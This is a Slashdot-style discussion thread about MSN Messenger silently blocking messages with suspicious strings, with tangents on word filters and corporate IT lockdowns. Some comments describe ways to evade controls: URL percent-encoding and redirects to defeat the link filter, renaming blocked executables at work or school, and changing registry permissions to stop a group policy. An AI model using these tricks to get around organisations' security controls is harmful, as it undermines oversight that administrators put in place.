MSN Censors Your IM

Jamie ran across a story about censorship on MSN. Essentially, a number of suspicious strings result in silent failure of delivery. The strings are unsurprisingly things like .scr and .info. They've started maintaining a list if you're interested. Personally, I'd rather they fix the vulnerabilities that make those strings dangerous in the first place: it's not like IM is the only place a URL can get on your machine.

The genius that is Microsoft...

[KingSkippus]

From an article that is linked to from this one:

The link filter does not take canonical URLs into account: http: //evil.example.com/download.php and http: //evil.example.com/down%6Coad.php is the same URL, expressed in two different ways. The first one is blocked, while the second one is not.

Or for that matter, http: //tinyurl.com/z35a5.

Kind of reminds me of our software filter where I work. They blocked firefox.exe from running. My solution? I renamed the file to iexplore.exe. Worked like a charm.

It's also probably worth noting that the messages are blocked on the server, not the client. That means that it will block the message whether you're using the MSN client, Pidgin, or any other client to access MSN.

My advice: Get a frickin' Google mail account already and use Google Talk instead.

Re:The genius that is Microsoft...

[lattyware]

Or just any Jabber client, for that matter.

Re:The genius that is Microsoft...

[ghmh]

Kind of reminds me of our software filter where I work. They blocked firefox.exe from running. My solution? I renamed the file to iexplore.exe. Worked like a charm.

Just make sure you don't get fired for knowingly circumventing security measures....

Re:The genius that is Microsoft...

[ChowRiit]

People always miss the point in these arguments, and say "get such and such instead" - it doesn't help, because my friends use MSN, and probably the same for most tech savvy MSN users. Sure, I'd rather use a better protocol, but I'm stuck using what my friends are on. This is the problem with "picking" an IM - the decision isn't made by you, but by the people you want to talk to who already have picked one.

Re:The genius that is Microsoft...

[badc0ffee]

You are known by the company you keep. Either get other friends, or convert the ones you have. Don't put up with dumbing down to the lowest common denominator. To paraphrase someone elses sig: Twice half fast make the dumb mass whole.

Re:The genius that is Microsoft...

[kc2keo]

My school blocks programs from running on the computers also. I was running putty.exe or winscp.exe which was blocked. I renamed them to explorer.exe and notepad.exe and it ran fine.

Re:The genius that is Microsoft...

[rikkus-x]

"Either get other friends, or convert the ones you have"

Says the person with a binary signature.

Re:The genius that is Microsoft...

[Buran]

For using something that ISN'T full of security holes? Hah.

Re:The genius that is Microsoft...

[Zombywuf]

Or use OTR. http://www.cypherpunks.ca/otr/

Re:The genius that is Microsoft...

[Wordsmith]

The day I start picking my friends based on their responses to IM security issues will be a sad, sad day.

"Mom, I met a great girl. She's not very nice, and she's not very pretty, but she started using Jabber after the latest MSN fiasco. You'll love her. I'll have her message you; oh, but you'll have to switch of of AIM first, mom."

Re:The genius that is Microsoft...

[Geekbot]

Just watch out that they aren't using other software to monitor processes. You can change the filename to bypass the restrictions but there could be process monitoring software that would inform them that you are bypassing security measures. I doubt anyone cares *that* much, but CYA.

Re:The genius that is Microsoft...

[bredk]

OTR-encryption. Thanks. Bye.

Re:The genius that is Microsoft...

[Blakey+Rat]

My advice: Get a frickin' Google mail account already and use Google Talk [google.com] instead.

Sage advice, for a person with no friends. (Then again, if you have no friends, why would you use IM in the first place?)

"Switching" to GoogleTalk is easy; convincing the 40+ people on my list to all "switch" to GoogleTalk is less easy. Saying that they need to "switch" to GoogleTalk to talk to me will most likely result in them not talking to me. (So I guess I'm not as popular as I though!)

Of couse I put "switch" in quotes, because this is like the Mac Vs PC argument: there's absolutely nothing that stops you from using both, so the term "switch" is kind of stupid in this context.

Re:The genius that is Microsoft...

[Yodalf]

"... tech savvy MSN users. ..."

Hum. Yes. Of course.

That explains everything.

Re:The genius that is Microsoft...

[SanityInAnarchy]

This is why I have accounts all over the place on my Kopete -- there are people that I actually want/need to talk to occasionally who are on various other networks, everything from MSN to Yahoo. It's actually no more work for me to set those up and maintain them than it is to run Jabber.

But I also used to have a Jabber server. (Or I used to, and I will again when I get around to setting it up again.) I tell most people to just download Google Talk, though. That's the thing -- Jabber is trying to take IM where Email already is. Anyone can setup a mailserver and start selling or giving away email addresses, so there's actually competition for services.

Using MSN IM instead of Jabber is a bit like using Myspace instead of email.

Re:The genius that is Microsoft...

[tachyonflow]

it doesn't help, because my friends use MSN, and probably the same for most tech savvy MSN users. I'm a little surprised to hear that MSN is still so popular. Almost all of my friends are on Google Talk now. I didn't really expect that to happen, since MSN and the others were so established. However, it seems that including a talk client on the Gmail page was exactly what Google needed to get their foot in the door.

Re:The genius that is Microsoft...

Sounds like the same kind of protection that AppArmor does, easily bypassed.

Re:The genius that is Microsoft...

[Actually,+I+do+RTFA]

My advice: Get a frickin' Google mail account already and use Google Talk instead.

Because occasional random censorship (MSN), or using evil companies (AIM, MSN), is worse than having all your conversations logged or otherwise datamined to sell ads? And that doesn't even get into the ease of using products to encrypt your IMs to evade this.

Hating Google in 10 years will be as cool as hating Microsoft now. I'm getting a headstart.

Re:The genius that is Microsoft...

[Alchemar]

I had the same problem.... I picked better friends.

Anyone that I have any relation with knows that I will not contact them via MSN, AIM, My Space, Live Journal or any of their like. If they wish to communicate they can call me on the phone or send an email. If they push the point, I suggest that they learn to use IRC or obtain a HAM radio license with a morse code rating, and I will gladly send them an instant message. Most have selected the telephone as their main choise, but one now holds a General class license. I view them pushing their "favorite" method onto me insulting and expect them to feel the same. If they do not find a medium that is commonly available and required for business communications as aceptable, then I really don't want to be associated with them.

Re:The genius that is Microsoft...

Kind of reminds me of our software filter where I work. They blocked firefox.exe from running. My solution? I renamed the file to iexplore.exe. Worked like a charm. You "do" realize you're breaking your company/corporate policy by doing that, don't you?

Instead of taking the renegade route why don't you talk to management or IT or whomever can accept Firefox as an alternative browser.

Remember, your company/corporate computers are their property, not yours. They can decide what to run on it and how.

If you don't like it then change their mind or find another job, don't break the law.

Just my 2 cents.

Re:The genius that is Microsoft...

[Lumpio-]

Somebody needs to create a really evil exploit that uses a .com URL. We need to see if we can get Microsoft to block their own site.

-gasp- Slashdot, too!

[Aladrin]

"Nothing for you to see here. Please move along."

I'm guessing they're using that as a way to make sure only subscribers can get first post now? It wouldn't load for me until someone had posted.

As for the IM... I don't care what it is, it's not their job to censor it. Virus check attachments, sure... But not sensor the chat. Absolutely ridiculous. Reminds me of games that try to filter out all 'bad' words and end up filtering out words like 'fanny' because they mean 'butt' in the US and apparently refer to women's genitalia in the UK. How people NAMED Fanny deal with that, I can't imagine. There were quite a few more commonplace words that mean odd things in other languages or countries and were filtered as well. Ridiculous.

Re:-gasp- Slashdot, too!

People named Fanny are probably Swedish so it doesn't matter, it's just appropriate -- they're such asses/cunts for real...

Re:-gasp- Slashdot, too!

[KingSkippus]

Reminds me of games that try to filter out all 'bad' words

I play City of Heroes, and for some weird reason, it blocks the word "count." I think it was a typo when someone was entering words to block into the filter. It was just kind of funny, because I discovered it when I told someone, "Don't worry, you can count on me!" and it came out as "Don't worry, you can <bleep!> on me!" They had no idea what I was talking about, and it took a few entertaining minutes to hash out what was going on.

Re:-gasp- Slashdot, too!

[UbuntuDupe]

I remember on the Microsoft-run zone.com (a game site), the filter is also extremely harsh. They extended it to innocent topics that happen to get used for trolling a lot. (Don't ask how I know...) For example, you can't say "holocaust", apparently because people like to deny it, and you can't say any form of "racist".

Re:-gasp- Slashdot, too!

[gbjbaanb]

Ah, the northern Uk town of Scunthorpe has been affected by this problem for some time now. I think a "Scun" must be a rude word in American English or something.

Re:-gasp- Slashdot, too!

[jZnat]

And you usually can't say "sniggers". What are you supposed to use? "Snickers"? That's a candy, not a verb that means "laughing".

Re:-gasp- Slashdot, too!

[markxz]

In the Famous Five series of childrens' books one of the characters is called Aunt Fanny.

She also wrote a short story about a chocolate cock.

Re:-gasp- Slashdot, too!

I think it was a typo when someone was entering words to block into the filter.

Not necessarily a typo, some filters also block words that are similar to ones that listed to be censored.

Re:-gasp- Slashdot, too!

[Darren+Winsper]

Actually, it tends to be because Scunthorpe happens to contain the word "cunt".

Re:-gasp- Slashdot, too!

[KingSkippus]

For what it's worth, I got the joke. :-)

Re:-gasp- Slashdot, too!

And what about "niggardly"? It's a perfectly innocent word with no relation to racial epithets, but that doesn't stop some people.

Re:-gasp- Slashdot, too!

[karnal]

*whoosh*

Re:-gasp- Slashdot, too!

snicker is, actually, a word for laugh. in fact, it means "to snicker."

when it comes to language, it pays to not be niggardly.

Re:-gasp- Slashdot, too!

[Buran]

You can turn off the profanity filter. Go to Menu > Options and I think it is in the leftmost tab of the options window. Then you should no longer see this. But it's a per-user setting and is done on the receiving end so if your recipient has the filter on still they will see the censored word.

Why it thinks "count" is a swear word, I've got no idea, but turning off the nanny filter remains one of the first things I do when setting up a new character (I seem to remember that the filter is, like the UI colors, one of the things that isn't a global preference. Arrrgh).

Re:-gasp- Slashdot, too!

[KingSkippus]

The problem, though is that after the brouhaha, people started deliberately using the "innocent" word in mean-spirited ways. I mean, come on, before all of this mess, no one ever used the word niggardly in normal conversation. One guy does it, misguided racial accusations fly, stalwart defense is mounted, and now, people use it all the time. It's not that the word deserves to be more common; they're doing it specifically for the purpose of its new racial connotations even though there really shouldn't be any.

Read this section about the controversy in Wikipedia for more insight, and a good idea of why using the word "niggardly," even if it's technically correct in the sentence you've made, can still be taken in a racial sense. And, of course, ask yourself if you're using it because it happens to be the best word for the sentence, or because it sounds so much like the other n-word.

Re:-gasp- Slashdot, too!

[Darren+Winsper]

D'oh!

Re:-gasp- Slashdot, too!

[toddestan]

Similar things happen to people who live in Coon Rapids, which is the name of a real town in Minnesota.

Re:-gasp- Slashdot, too!

[matazar]

This reminds me of the word filter in Raganarok. The did a poor job of it because any word that had a swear word in it was filters.
You couldn't say japanese because it had jap in it.
You couldn't say cucumber because it had cum in it.


The list goes on and on.

Re:-gasp- Slashdot, too!

[janrinok]

WHOOSH......

Re:-gasp- Slashdot, too!

[einnar2000]

They filtered out "wristwatch" in Earth and Beyond because of the word in the middle of it, too. (Starts and ends with the Ts.)

Re:-gasp- Slashdot, too!

[Reaperducer]

The problem, though is that after the brouhaha, people started deliberately using the "innocent" word in mean-spirited ways. I mean, come on, before all of this mess, no one ever used the word niggardly in normal conversation.

Not necessarily. It depends on who's in your circle of friends. YOUR circle of friends may not use that word, but that doesn't mean that "no one" ever used it, especially in formal writing or speeches.

During the controversy, one of the newspapers (Boston, I think) ran through one of the loudest critics prior speeches and found that he'd used it in the past, as well.

Just because SOME people are that special combination of both ignorant and loud, it shouldn't change the way educated people communicate.

Re:-gasp- Slashdot, too!

[mpe]

Reminds me of games that try to filter out all 'bad' words and end up filtering out words like 'fanny' because they mean 'butt' in the US and apparently refer to women's genitalia in the UK. How people NAMED Fanny deal with that, I can't imagine.

Even more difficult if they are called "Fanny Babcock". IIRC Someone actually compiled a webpage entitled "Smut which only a machine could identify".

Re:-gasp- Slashdot, too!

[mpe]

They filtered out "wristwatch" in Earth and Beyond because of the word in the middle of it, too. (Starts and ends with the Ts.)

A classic problem with poorly defined regular expressions as "profanity filters". It might help to "throw a dictionary at it" as part of testing. i.e. Before letting people see how daft it actually is...

Re:-gasp- Slashdot, too!

[SanityInAnarchy]

I play an MMO which has a reasonable language filter, or as reasonable as it can be. Rather than bleeping stuff, it simply substitutes the "bad" word for an "equivalent". It also makes for some rather hilarious conversations, once they decided that in most cases, you were allowed to swear so long as you didn't attempt to bypass the language filter.

It doesn't catch everything, as it doesn't look at the boundries of words, so that you can't get around "fuck" by saying "fucker" or "fucking".

Here's a short list of what I can remember:

fuck -> darn
shit -> dang
slut -> girl
whore -> maid
bitch -> dog
asshole -> ant
bastard -> idiot
wtf -> wt
password -> soul
pussy -> cat
(any body part not outright censored) -> toe
(some body parts are completely censored -- cock, for instance)

And so on. It also has funny things like: If you attempt to say your password in any way inside the game, it will actually boot your to your desktop with an error message of something like "Please try to keep your password safe!"

What's funny is, I think it's actually legal to say things like "darn you", but not things like "so I was darning this girl..."

It's also entirely illegal to attempt to circumvent the language filter -- you can say "darn you, you piece of dang", but not "f uck you"...

In general, it rarely causes problems, although it becomes a problem if you want to talk about out-of-character things like Alfred Hitchcock. (Yes, actually did run into that one.) I also fail to see why private messages should be censored that way... But anyway, it's tolerated mostly because it's actually hilarious, and only very occasionally is unavoidable. For example, the Archons occasionally post computer security tips to the boards, but "password" is censored, so they have to say something like "passwrod".

Anyway, as far as I'm concerned, I'm not opposed to a voluntary censorship on the receiving end, even one that an admin (or parent) can turn on and leave on. I'm also not opposed to banning people for swearing and making assholes of themselves in large public areas of an MMO (usually they're jailed instead of banned, but whatever). But I do agree that on a private IM, or any other private message, it's not up to the network to unilaterally censor anything, especially such broad crap like .info.

Re:-gasp- Slashdot, too!

So you troll there too?

Re:-gasp- Slashdot, too!

[KingSkippus]

Sorry for the confusion, but my profanity filter was off. (One of my first steps, too.) Theirs was on. Thus, the ensuing hilarity. The person I was talking to thought I was saying something obscene; all I saw was that I told them they could count on me, and they were acting like I had just cussed them out.

Re:-gasp- Slashdot, too!

[glitch23]

Ah, the northern Uk town of Scunthorpe has been affected by this problem for some time now. I think a "Scun" must be a rude word in American English or something.

No, it's "Thor". We don't like Scandinavians.

Re:-gasp- Slashdot, too!

[Buran]

Which is pretty funny when you think about it ... Do they have anything against a certain vampire in Transylvania, for instance!?

If you haven't already done it, I'd file a bug report. Type /bug (blahblah) to open a bug report window with the command argument pre-entered as the subject line for the bug.

Re:-gasp- Slashdot, too!

[Kris_J]

Save a thought for poor old Dick Smith Electronics. They sell World of Warcraft but you can't say their name on the official WoW forums.

Re:-gasp- Slashdot, too!

However bad Ragnarok was, Runescape is ten times worse.

The filter automatically detected LIKELY word combinations, rather than just being a dictionary of blockable swear words, so it would sometimes block things that weren't even words.

if you tried to type ";/." for whatever reason (YOU MIGHT WANT TO!!!)
it would come up as "***".

It was just nonsensical.

Re:-gasp- Slashdot, too!

[mdmkolbe]

Reminds me of when Amarica's Army tried an unusually way of filtering for a while. Instead of blocking the word, they substituted it with less offensive synonym. For example if I said "Joe is camping", you would see "Joe is using tactics". Three things came out of that:

1. It took me a while to figure why everyone was complaining about tactics.
2. People quickly learned to miss-spell certain key works (e.g. "campting" became "kamping").
3. I think AA gave up on the idea b/c anything like this is to easy to defeat. (See #2)

Re:-gasp- Slashdot, too!

[Sigma+7]

Reminds me of when Amarica's Army tried an unusually way of filtering for a while. Instead of blocking the word, they substituted it with less offensive synonym. For example if I said "Joe is camping", you would see "Joe is using tactics". Three things came out of that: While that might have been abandoned, there's a way to fix it in future implementations.

As soon as the word camping comes up, print an in-game ad for "camp-buster", that kills off players standing still for more than ~300 milliseconds. It's more than enough time to keep players in action, and will cut down on any issues with players holding down a single area by "camping".

Re:-gasp- Slashdot, too!

[ChameleonDave]

Speaking of the name "Fanny" being used to mean "pussy"... that reminds me of when my girlfriend and I had to organise a visit to a gynaecologist for her. We were looking through the Yellow Pages when we saw a certain Dr Fanny Mouilleron. Well, we couldn't miss the opportunity to go and see the "fanny doctor". It had us cracking up. We didn't have the guts to explain the joke to her, though. ;-)

Come to think of it, her surname sounds a lot like ''mouillé'', meaning "wet". That's even funnier!

Re:-gasp- Slashdot, too!

The residents of Clitheroe were similarly offended.

Re:-gasp- Slashdot, too!

[Corporate+Troll]

Come to think of it, her surname sounds a lot like ''mouillé'', meaning "wet". That's even funnier!

Only "even funnier". Ehm... Yes, but only because your grasp of french seems not to extend to certain areas. "La mouille" (no accent in this case) is a word for vaginal secretions, those of the kind that women have when they get excited if you catch my drift. So, yes, that name is funny. But, you're right, it evidently comes from "mouillé" which means "wet".

That said, "Mouilleron" is a village in France. Probably the true origin of her surname.

Re:-gasp- Slashdot, too!

[ChameleonDave]

Yes, but only because your grasp of french seems not to extend to certain areas. "La mouille" (no accent in this case) is a word for vaginal secretions

Yeah, and there's the verb mouiller too. What's your point? Did you think I was talking about rain, or freshly washed lettuce? I was talking about vaginal secretions. I think you just wanted to say your French was better than someone else's.

That said, "Mouilleron" is a village in France. Probably the true origin of her surname.

No doubt, although it doesn't really add anything to the anecdote. Hey, I can use Google too: there's a village called "La Mouille". The guys there must be hunky.

Re:-gasp- Slashdot, too!

[Corporate+Troll]

No, you said just "wet", implying indeed vaginal secretions but not stating that there is even a word that is exactly what you meant in French. So, you're pissed because I attacked your French? My excuses for that, I just thought that you didn't know what "la mouille" means. I still think you didn't know....

Oh, and there is also a difference between having to Google and actually knowing without Googling... You did know that, didn't you?

Re:-gasp- Slashdot, too!

[Corporate+Troll]

Oh, I see where the wind is coming from. I insulted a translator in his trade. So, I take that back.... You did know what "mouille" meant, but you chose not to tell the slashdot readers. For whatever reason....

The French on your site still is very pompous, but hey, that's just me.

Re:-gasp- Slashdot, too!

[Cro+Magnon]

ROTFLMAO! I was once on a website that filtered wristwatch, tycoon (last 4 letters are racial slur), and our VP's first name. So I made a point of bringing up those topics of conversation, just to show how stupid the filter was.

Re:-gasp- Slashdot, too!

[mdmkolbe]

Heh, cute, but I fear that would just teach everyone to constantly do an irish jig. Humans are very good at adapting in ways you don't expect.

Since AA is an army based offense/defense game it would also kind of defeat the style of the game. An effective defensive team may spend 5-10 min waiting for the offense to advance to the point that they have chosen to defend. The offense takes that long to get there because they have to carefully clear each room so they don't get shoot in the back while taking the objective. When your job is to defend a certain objective and one bullet kills with no respawn, "camping" is a very legitimate tactic.

That said, I still think banning the word "camping" was silly.

Re:-gasp- Slashdot, too!

[dickrichardv8]

An irc bot chastised me for using the name "Alan Cox" in conservation. I wonder how Mr Cox feels about being a no-no name on #ubuntu on Freenode.

Re:-gasp- Slashdot, too!

they're doing it specifically for the purpose of its new racial connotations even though there really shouldn't be any.

A mindreader, are you?

Huh?

[jafiwam]

"Fix the vulnerabilities first"?

WTF you talkin bout. Out of that list used as an example, 5 were PHP security problems (who has PHP installed on the local PC?) one was an odd but normal TLD. One was an executable file.

I'd like to know, how "just fix the software" works in a world where 60% of users don't know about updates, don't update when they do know, or use pirated software the vendor actively blocks from updates.

There are certain strings that have no legit business in MSN chat, that's true. In my opinion, that list doesn't have any of them, AND poses a threat to other stuff aside from the local computer.

God Damn I hate bloggers.

Re:Huh?

[lattyware]

No. The first 5 were urls where there was the beginning of passing a variable in the GET style. As used by PHP. None of them are a vulnerability, they are just pages that sound likely to have a vulnerability.

Re:Huh?

There are certain strings that have no legit business in MSN chat, that's true.

Who the fuck do you think you are, and what gives you the right to tell people what they can and can't talk about on MSN?

Re:Huh?

I'd like to know, how "just fix the software" works in a world where 60% of users don't know about updates, don't update when they do know, or use pirated software the vendor actively blocks from updates.

Easy there.... Don't bust a vein.

Programming to the least common denominator because you assume the majority of users are idiots is exactly the reason we end up with shitty software like most of what Microsoft produces. It ends up being difficult to do anything but what they decided it's "safe" for you to do. Things they made a wizard or button for, and that's it. People how know what they're doing lose functionality. And the benefit? It keeps the idiots out of trouble for about 3 days until the people who exploit idiocy find a new way.

How do you fix this when users don't update? Easy. Fix the problem, release a patch, and then don't allow users to connect unless their systems are patched. Or make it an option that's on by default, but can be turned off.

Anybody else notice its .php files that get ...

[crovira]

squashed?

And what does every Linux web server come with?

RIGHT...

Re:Anybody else notice its .php files that get ...

[jZnat]

Every Linux web server comes with Perl also...

Anyhow, I think it's because script kiddies tend to use (or exploit) PHP applications more often than other scripting languages due to its high availability in cheap hosting environments.

Re:Anybody else notice its .php files that get ...

[DrSkwid]

Also the php files are in the document_root directory (or whatever you want to call it). Write access to document_root should be off but it usually isn't.

Perl and other CGI stuff is usually script aliased out of document_root and run from there /www/public_html # document root /www/public_html/index.php # shitty PHP script /www/cgi-bin /www/cgi-bin/dirty_perl.pl # Long tooth Larry's stuff

And pl files also need chmod +x ing whereas php files will just run.

Those crazy "easy to set up" routes get you owned, but they always want to learn the hard way.

Re:Anybody else notice its .php files that get ...

[Lillesvin]

Also the php files are in the document_root directory (or whatever you want to call it).

Yeah, on the server - then they could exploit the server hosting them... Why on earth would MS care about that? They're doing the filtering to protect the end-users from exploits of vulnerabilities in the MSN client. It doesn't matter the least bit if it's PHP, Perl, Ruby, ASP or whatever that runs on the server-side - it's what is returned from the server-side that matters. I'll have to agree with the guy guessing that PHP is usually the first choice of scripting language for script kiddies.

And as the first poster noted, TinyURLs get through just fine, plus it'd be the least of problems to make a HTTP redirect, so http://example.com/harmless.script points to http://example.com/malicious.script?that=pwns&MSN= users. This way of "fixing" bugs is nothing but retarded - it fixes nothing and it hassles end-users a great deal - some of those substrings that are getting blocked are VERY common.

Blocked firefox.exe

[nurb432]

And simply renaming worked? Your IT department is pretty inept.

Re:Blocked firefox.exe

[lattyware]

An inept IT department?
OMFG!
Someone alert the world press!

Re:Blocked firefox.exe

[nurb432]

There are reasons to block it, and anything else the user wants to install on their own.

Re:Blocked firefox.exe

[tepples]

There are reasons to block it, and anything else the user wants to install on their own. But still, only an inept IT department would refuse to consider a reasonable proposal to whitelist a version of Mozilla Firefox software in appropriate circumstances.

Re:Blocked firefox.exe

[KingSkippus]

No, they specifically blocked firefox.exe. It wasn't part of a regular expression or policy to keep people from running their own programs. They made a deliberate and conscious choice to not only standardize on Internet Explorer as the Official Company Browser(TM), but to try to prevent anything else from even working.

It's not the only time they've done something lame-ass like that. For example, they've also created an Active Directory policy to push down the corporate intranet page as your home page. So if you're like me and prefer something like Google as your home page, too damn bad, it resets it next time you log in. I had to go in and deny permission to that registry key for Administrators to keep that from happening. (Yes, I know, they can reset the permissions on the key if they figure out what I've done, but they're not that motivated, and the point was to keep the automatic update from happening, which this does successfully.)

Re:Blocked firefox.exe

[QuoteMstr]

Sure: to provide justification for your own job.

Re:Blocked firefox.exe

[nurb432]

Pushing down the default page via GPO sonuds pretty responsible to me. It helps prevent users default pages getting hijacked with porn sites, among other things.

Part of It's job is to protect the corporate computing assets and keep them running properly for the needs of the job. If that happens to step on your personal wants, then thats too bad. The PC is there for work, not as a toy for you. You have your personal toys at home.

Re:Blocked firefox.exe

[nurb432]

User installed softare that isnt part of hte official internal standard increases support costs, among other issues. So unless there is a business need, i dont see a problem with it being blocked. ( tho, simply blocking an executable name isnt the right way to do it, but that is a different discussion )

Now, if you come up with a valid business need for said non standard software, and its ignored, then we are in agreement.

Re:Blocked firefox.exe

[KingSkippus]

If that happens to step on your personal wants, then thats too bad.

What if it steps on what I need to do my job? I'm glad I don't work for you. You seem to be one of those types that thinks that just because something can be done, it needs to be done. Pushing down the default page doesn't protect the corporate computing assets, though I'm sure that's how our desktop goobers pitched it to management. It's just one more way to control things they have no business controlling, and it impacts our productivity.

They also do thinks like push down custom Start Menu structures. Microsoft Word, for example, isn't under All Programs or even Microsoft Office like it is on every other computer. No, it's buried under "Office Applications" (not to be confused with "Business Applications," a separate directory), along with things like Adobe Acrobat and such. They've also moved Windows Explorer (the filesystem explorer, not Internet Explorer) under Accessories. If I change this to something I'm more used to, it gets reverted next time I log in. Obviously, they've also deleted and blocked Solitaire and Minesweeper from running; it wouldn't do for people to take a break from hammering their stones. The company logo is pushed out to be everyone's desktop background.

My favorite, though, is that they've decided that everyone needs a little application called Kontiki. It's a peer-to-peer video distrubtion software system that turns all of our PCs into filesharing peers for corporate videos. You can't disable it and you can't delete the videos that it pushes down. (If you try to deleting a video, the software automatically re-downloads it from--you guessed it--your coworkers computers.) I detest days when corporate videos go out. My bandwidth is sucked dry by something I neither want nor use and have no control over.

Let's see... Need more stories? How about this. They recently pushed out a piece of software called Connected Backup. What happened is that our fileservers where people's home directories were started filling up. Instead of going out and buying more hard drives or implementing quotas, they've rolled out this backup software to everyone's computer that automatically backs up your machine once a day whether you want it to or not. Now, they're telling everyone that official company policy is to NOT store important documents on the fileservers, but to store them on your local PCs. Brilliant! Of course, network traffic has shot up dramatically, and the backup servers had to have a TON of storage added to them (the data still has to go somewhere), and instead of only things that people save on the fileservers being backed up, all of their personal shit is, too.

Every day, my computer runs a Connected backup, a virus scan, a vulnerability scan, a document retention scan, a software installation scan, Notes database replication, and my Run key in the registry has around 50 entries in it that our desktop group has loaded in, and it takes around two minutes for all of the group policies and login scripts to run when I log in. Thanks to our desktop group, literally 30 minutes of my day is wasted waiting for all of that shit to run.

I could go on with the stupidity if you really want me to. You're right about one thing; they've definitely protected the corporate computing assets. People hate using their computers so much now that a lot of people I know have gone back to just leaving it on all the time for doing their timesheets, and conduct their normal business using such old school methods such as the telephone and pencil and paper. As for me, I actually do some of my work at home using my own computing resources, and the only reason I can tolerate using my work computer for anything is because I know how to get around most of the shit they try to push down on us.

Re:Blocked firefox.exe

[nuggetman]

My favorite useless app we have is a small red E on a shield in the system tray. You double click it and it opens an intranet page along the lines of

WHAT DO YOU NEED TO DO
-Evacuate the building
-Report a fire or police emergency
-I received a suspicious package
etc

Re:Blocked firefox.exe

[Dragonslicer]

There are reasons to block it, and anything else the user wants to install on their own. Except they apparently didn't block a user from installing Firefox, but only prevent a program named firefox.exe from running.

Re:Blocked firefox.exe

if you come up with a valid business need for said non standard software I need to make sure, to the best of my ability, that my computer remains as secure as possible. Can I download Firefox now, boss?

Re:Blocked firefox.exe

Part of It's job is to protect the corporate computing assets and keep them running properly for the needs of the job. If that happens to step on your personal wants, then thats too bad. The PC is there for work, not as a toy for you. You have your personal toys at home.

You seem to have a bizarre belief that any divergence from Central Planning's control is due to a desire to inappropriately use work machines as toys. In reality, people can get a lot more work done with Firefox and google.com than with Internet Explorer and the company intranet landing page. As strange as it may seem, people use the Internet - even the world wide web - to get information to do their jobs.

Re:Blocked firefox.exe

[nurb432]

Thats not a business case. Thats just a lame excuse.

And in a well run shop, even if you got permission to run it, the IT department would have to install it for you. You wouldn't be downloading it yourself.

Once you grow up and have to support 40000 users, you might understand that things are different in the business world then they are at home.

Re:Blocked firefox.exe

Right, because fixing Joe Blow's with reactive anti-spyware and anti-virus software is so much better than actually using software that prevents such problems in the first place.

Re:Blocked firefox.exe

[AuMatar]

Support costs? If the user knows enough to be able to download Firefox, he knows enough to support it himself (and really, the "support costs" of a freaking browser are zero anyway). So there are no support costs.

Re:Blocked firefox.exe

[mindstrm]

I get it.. you are one of THOSE users, who thinks he knows more than we do about how computers work, and how corporate IT should be run.

You do realize that 99% of the time, these stupid policies and bizarre decisions are NOT ours to make in the first place? We get it, man.. we aren't some morons who don't know how to use computers. Odds are we know better than you... and we hate the policies that are in place MORE than you do for the same reason.

We don't go to management and tell them we don't want anyone to have minesweeper or solitaire... frankly we don't give a shit. Some higher up executive, though, decided to bring it up at a high level management meeting and upper management decided IT had to spend their time locking down stupid default video games rather than doing real work. That meeting spawned more meetings about security.. and eventually the entire corporate PC policy was designed by committee.

Feel free to blame IT though; we're used to it.

As for the backup policy... we agree with you completely.. but unfortunately the insane mob that represents the majority of users and management felt their workstations should have full backup, and management made that a priority. Now that the budget has been blown on ridiculous amounts of backup hardware, you see, we can't afford to grow the file servers. So please, cooperate with us, and just keep all your stuff on your PC.

Re:Blocked firefox.exe

[Geekbot]

True. IT doesn't make money, it saves money. With limited sources the IT depts have to decide how to get the most done and get the most satisfaction out of limited resources that wont completely satisfy anyone. Add to that the insane and expensive projects demanded by those who are paid enough to know better, or, at least to rely on people that know better, and you end up with a herculean task that anyone in IT who is competent should be getting a medal. But, the bigger the company is, the more important that it have standardized interfaces and support. This is less efficient for everybody, but still probably saves a ton of money by moderately inconveniencing people instead of facing major internal threats.

Re:Blocked firefox.exe

[3vi1]

It helps prevent users default pages getting hijacked with porn sites, among other things.

A decent firewall and web proxy would be about 100x more practical. Changing the home page as a policy is just doing something irritating for the sake of doing it.

The original poster overthought the way around it too. All he actually needed to do was create shortcut to google and use that to launch the browser instead of playing with registry permissions.

-J

Re:Blocked firefox.exe

[Lehk228]

with two clicks you could evacuate the building? sweet next time a co-irker leaves his/her machine unlocked while they use the bathroom have a bit of fun

Re:Blocked firefox.exe

[br14n420]

This got me modded a troll the last time I said it, but I changed jobs over disliking microsoft products and began working for a company with BSD, Linux, OSX as the primary choices. The only Windows box is run under vmware ESX, and is only used for applications we just have to run Windows for on occasion.

Prior to changing jobs, I bitched and moaned non-stop about the insanity of every shop I had worked in since 2000, as they had all been forced into using primarily Windows on desktops and servers to emulate the steps the top earners in the field were doing. You can't blame them, really, because if they go against the grain, so to speak, and adopt a minority view of how big business is run, go through with it on the investor's dime, and fail, their ass is on the line, their entire future as a VP, Pres, Director, etc will forever be changed.

The guy sitting in the cube bashing his keyboard in over an IE crash tends not to thing of it this way, though it is often the reality and there's nothing a low-level is going to do to change it, aside from getting promoted up and then seeing if he has the gumption to risk his future on something that may, or may not, be the best fit for the IT as a whole.

Re:Blocked firefox.exe

Seriously... since your company seems to go against your ability to do your job, how about you go out and find a new one?

Re:Blocked firefox.exe

[Uruz+7]

Wow man, that's friggin' horrid. I hope you take home a nice chunk of change to put up with that.

I've only worked for progressive internet companies so I haven't witnessed these types of horrors but it pisses me off when people think you will be more productive when they structure everything (your desktop, schedule, dress code, etc). While I don't think people should have porn on their work PC, come in late, or dress like a hobo. I do feel you should be able to make things as comfortable as then can be within reason.

Re:Blocked firefox.exe

[Rakishi]

Connected backup is used where I work but users get to set when things get backed up and what things get backed up. You can also cancel backups but after a couple weeks you will get an email telling you to do a damn backup.

Re:Blocked firefox.exe

[Rakishi]

come in late Why should it matter when someone comes in as long as they get work done (which may include meetings, etc.)?

Re:Blocked firefox.exe

Pushing down the default page via GPO sonuds pretty responsible to me. It helps prevent users default pages getting hijacked with porn sites, among other things. What does that even mean, hijacked? Does IE let random sites change your default page?

Part of It's job is to protect the corporate computing assets and keep them running properly for the needs of the job. If that happens to step on your personal wants, then thats too bad. The PC is there for work, not as a toy for you. You have your personal toys at home. If you think changing my homepage to Google is treating the computer like a toy then you have some SERIOUS control issues. I'll bet you count the number of squares of toilet paper your employees use too.

Re:Blocked firefox.exe

Mod parent up!

It's a VERY valid point, any admin blocking FireFox is an idiot.

Re:Blocked firefox.exe

[innocent_white_lamb]

and really, the "support costs" of a freaking browser are zero anyway
 
"Hello, helpdesk? Website X isn't working. What? It's working for you? Then there is something wrong with this computer. I want to file a help ticket now."
 
We're probably up over twenty dollars already and haven't even sent someone out to look at this guy's computer yet.

Re:Blocked firefox.exe

[Kalriath]

